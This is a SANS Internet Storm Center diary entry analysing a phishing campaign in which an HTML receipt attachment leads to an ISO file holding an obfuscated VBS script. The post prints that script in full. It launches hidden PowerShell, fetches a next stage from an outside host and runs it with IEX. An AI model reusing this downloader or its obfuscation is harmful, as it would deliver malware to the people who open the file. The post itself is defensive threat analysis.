I spotted an interesting phishing email. As usual, the message was delivered with a malicious attachment that is a simple HTML page called “Order_Receipt.html” (SHA256:a0989ec9ad1b74c5e8dedca4a02dcbb06abdd86ec05d1712bfc560bf209e3b39) with a low VT score of 5/59! This is a text file and, therefore, looks less suspicious. When the page is opened in the victim’s browser, it displays a simple message and offers the victim to download an ISO file:
The beginning of the page is filled with junk text that is not displayed:
In modern times a starter can hard ...
Most Windows systems today are able to open ISO files without extra software but this one is not formatted in NTFS and can’t be mounted by a stock Windows 10:
Once mounted, the ISO file discloses only one file: a VBS script:
[email protected]:/MalwareZoo/20220127$ sudo mount -o ro APVSTYS43574.iso /tmp/iso [email protected]:/MalwareZoo/20220127$ ll /tmp/iso total 23 dr-xr-xr-x 1 root root 2048 Nov 12 10:15 ./ drwxrwxrwt 24 root root 20480 Jan 27 15:31 ../ -r-xr-xr-x 1 root root 807 Nov 12 10:15 APVSTYS43574.vbs*
The VBS script (SHA256:ddb517300a9f93fad769e003cb9d3cfeb66231c1ff8a359ff39ddb2c07ff10e7) is unknown on VT. It is obfuscated but easy to decode:
AOKO = ("t.S") KITK = ("p"+AOKO+"h") OEWM = ("i"+KITK+"el") VURQ = ("Scr") Set RCLD = CreateObject("W"+VURQ+OEWM+"l") ZCZI = "mm" HBMV = "pow" MNGZ = "ell" VADV = "sh" VEIF = " -Co" OLMG = "er" OQGT = "and " UYFU = "[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname" JNUZ = "((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method," VORR = "'++++++++++++++++++++++++###################'.Replace('++++++++++++++++++++++++','https://cozumrekla').Replace('###################','mkayseri.com/.Fainl.txt')" WJKC = ")|IEX;[Byte]" OLHB = "$f=[Microsoft.VisualBasic.Interaction]::CallByname" RCLD.Run HBMV+OLMG+VADV+MNGZ+VEIF+ZCZI+OQGT+UYFU+JNUZ+VORR+WJKC+OLHB,0
It’s pretty easy to understand: A mix of small strings is concatenated and others are replaced. The VBS script tries to download the next stage from hxxps://cozumreklamkayseri[.]com/.Fainl.txt. But the site is down. I found the last known IP address thanks to passive DNS services. But the site does not serve the malicious payload anymore…
A pretty nice example of a message that can still bypass many controls today…
Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.